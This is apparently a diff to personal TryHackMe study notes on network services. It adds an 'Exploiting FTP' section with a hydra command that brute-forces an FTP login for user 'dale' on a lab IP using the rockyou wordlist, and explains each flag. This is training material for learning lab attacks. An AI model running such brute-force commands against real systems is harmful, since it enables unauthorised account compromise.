nkn-ctrl/TryHackMe/Cyber_Defense/Network_Services.md

 - In a Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.

 ### Exploiting FTP
+#### hydra
+`hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp`
+`hydra` Runs the hydra tool
+`-t 4`  Number of parallel connections per target
+`-l [user]` Points to the user who's account you're trying to compromise
+`-P [path to dictionary]`   Points to the file containing the list of possible passwords
+`-vV`   Sets verbose mode to very verbose, shows the login+pass combination for each attempt
+`[machine IP]`  The IP address of the target machine
+`ftp / protocol`    Sets the protocol